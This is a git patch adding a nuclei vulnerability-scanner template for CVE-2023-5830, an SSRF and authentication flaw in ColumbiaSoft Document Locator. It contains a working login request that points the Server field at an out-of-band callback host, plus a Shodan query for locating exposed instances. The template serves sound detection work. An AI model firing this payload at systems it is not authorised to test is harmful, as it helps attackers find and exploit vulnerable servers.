From 4baef3fda559646fd1eb36777d79c2c8e95aec64 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Sun, 17 Mar 2024 10:41:15 +0530
Subject: [PATCH] Create CVE-2023-5830.yaml

---
 http/cves/2023/CVE-2023-5830.yaml | 68 +++++++++++++++++++++++++++++++
 1 file changed, 68 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-5830.yaml

diff --git a/http/cves/2023/CVE-2023-5830.yaml b/http/cves/2023/CVE-2023-5830.yaml
new file mode 100644
index 0000000000..558ceed547
--- /dev/null
+++ b/http/cves/2023/CVE-2023-5830.yaml
@@ -0,0 +1,68 @@
+id: CVE-2023-5830
+info:
+  name: ColumbiaSoft DocumentLocator - Improper Authentication
+  author: Gonski
+  severity: critical
+  description: Instances of ColumbiaSoft's Document Locator prior to version 7.2
+    SP4 and 2021.1 are vulnerable to an Improper Authentication/SSRF
+    vulnerability. This template identifies vulnerable instances of the
+    ColumbiaSoft Document Locater application by confirming external DNS
+    interaction/lookups by modifying the value of the client-side SERVER
+    parameter at /api/authentication/login.
+  impact: |
+    An attacker could exploit this vulnerability to gain unauthorized access to sensitive information.
+  remediation: |
+    Upgrade to a patched version of ColumbiaSoft DocumentLocator to fix the improper authentication issue.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-5830
+    - https://vuldb.com/?ctiid.243729
+    - https://github.com/advisories/GHSA-j89v-wm7x-4434
+    - https://vuldb.com/?id.243729
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-5830
+    cwe-id: CWE-287
+    epss-score: 0.00091
+    epss-percentile: 0.37582
+    cpe: cpe:2.3:a:documentlocator:document_locator:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: documentlocator
+    product: document_locator
+    shodan-query: 'title:"Document Locator - WebTools"'
+  tags: cve,cve2023,ssrf,unauth,columbiasoft,intrusive,webtools
+
+http:
+  - raw:
+      - |
+        @timeout: 30s
+        POST /api/authentication/login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json;charset=UTF-8
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
+        Accept-Encoding: gzip, deflate
+        Accept-Language: en-US,en;q=0.9
+
+        {
+          "LoginType":"differentWindows",
+          "User":"{{randstr}}",
+          "Password":"{{rand_base(5, "abc")}}",
+          "Domain":"{{randstr}}",
+          "Server":"{{interactsh-url}}",
+          "Repository":"{{randstr}}"
+        }
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - '"Authorized":false'